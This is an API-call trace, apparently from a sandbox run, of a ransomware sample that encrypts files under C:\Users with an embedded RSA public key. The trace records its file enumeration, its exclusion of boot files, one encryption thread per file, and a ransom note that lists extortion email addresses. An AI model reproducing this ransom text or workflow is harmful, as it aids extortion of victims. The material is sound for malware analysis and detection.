returned="C:\\" [0099.412] lstrcatW (in: lpString1="C:\\", lpString2="Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0099.412] SetErrorMode (uMode=0x1) returned 0x1 [0099.412] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0099.413] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0099.413] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0099.413] lstrcatW (in: lpString1="C:\\Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0099.413] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.413] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0099.413] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0099.413] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.413] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.413] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.413] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.413] lstrcmpW (lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpString2="..") returned 1 [0099.413] lstrcmpW (lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpString2=".") returned 1 [0099.413] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0099.413] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntldr") returned 0x0 [0099.413] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTLDR") returned 0x0 [0099.414] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0099.414] StrStrW (lpFirst="D2D9507033A5E4DB82B20D90383EC923.XZZX", lpSrch="ntdetect.com") returned 0x0 [0099.414] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0099.414] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0099.414] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\") returned 13 [0099.414] lstrcpyA (in: lpString1=0x17ea5c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.414] lstrcpyW (in: lpString1=0x17f05c, lpString2="D2D9507033A5E4DB82B20D90383EC923.XZZX" | out: lpString1="D2D9507033A5E4DB82B20D90383EC923.XZZX") returned="D2D9507033A5E4DB82B20D90383EC923.XZZX" [0099.414] lstrcpyW (in: lpString1=0x17ec5c, lpString2="\\\\?\\C:\\Users\\" | out: lpString1="\\\\?\\C:\\Users\\") returned="\\\\?\\C:\\Users\\" [0099.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17ea5c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x294 [0099.414] Sleep (dwMilliseconds=0x96) [0099.564] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.564] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.564] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.564] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.565] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0099.565] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0099.565] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0099.565] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0099.565] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.565] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 0 [0099.565] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0099.565] lstrcatW (in: lpString1="C:\\Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0099.565] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0099.565] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0099.565] SetErrorMode (uMode=0x1) returned 0x1 [0099.565] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\_HELP_INSTRUCTION.TXT") returned 30 [0099.565] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.565] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.566] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x298) returned 0x0 [0099.566] RegQueryValueExW (in: hKey=0x298, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cadbe8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cadbe8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.566] RegCloseKey (hKey=0x298) returned 0x0 [0099.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.566] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.566] CreateFileW (lpFileName="C:\\Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0099.566] CloseHandle (hObject=0x298) returned 1 [0099.566] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.566] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0099.566] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0099.566] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0099.566] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.566] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.566] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.566] FindNextFileW (in: hFindFile=0x3a5510, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0099.566] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0099.567] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0099.567] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0099.567] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0099.567] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0099.567] SetErrorMode (uMode=0x1) returned 0x1 [0099.567] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0099.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.567] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0099.567] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0099.567] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0099.567] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0099.567] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.567] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.567] lstrcmpW (lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpString2="..") returned 1 [0099.567] lstrcmpW (lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpString2=".") returned 1 [0099.567] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0099.567] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntldr") returned 0x0 [0099.567] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTLDR") returned 0x0 [0099.567] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0099.567] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntdetect.com") returned 0x0 [0099.567] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0099.567] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0099.567] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0099.567] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.567] lstrcpyW (in: lpString1=0x17dfbc, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0099.567] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a0 [0099.568] Sleep (dwMilliseconds=0x96) [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.736] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0099.736] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0099.736] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0099.736] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0099.736] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0099.736] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0099.736] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0099.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0099.736] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0099.736] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0099.736] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.736] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0099.736] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a4 [0099.737] Sleep (dwMilliseconds=0x96) [0099.897] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0099.897] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0099.898] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0099.898] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0099.898] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntldr") returned 0x0 [0099.898] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTLDR") returned 0x0 [0099.898] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0099.898] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntdetect.com") returned 0x0 [0099.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0099.898] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0099.898] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0099.898] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.898] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0099.898] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0099.898] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0099.899] Sleep (dwMilliseconds=0x96) [0100.048] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.048] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0100.048] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0100.048] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.048] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntldr") returned 0x0 [0100.048] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTLDR") returned 0x0 [0100.048] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0100.048] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntdetect.com") returned 0x0 [0100.048] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0100.048] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0100.048] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0100.048] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.048] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0100.049] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ac [0100.049] Sleep (dwMilliseconds=0x96) [0100.207] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0100.207] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0100.207] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0100.207] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0100.208] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0100.208] 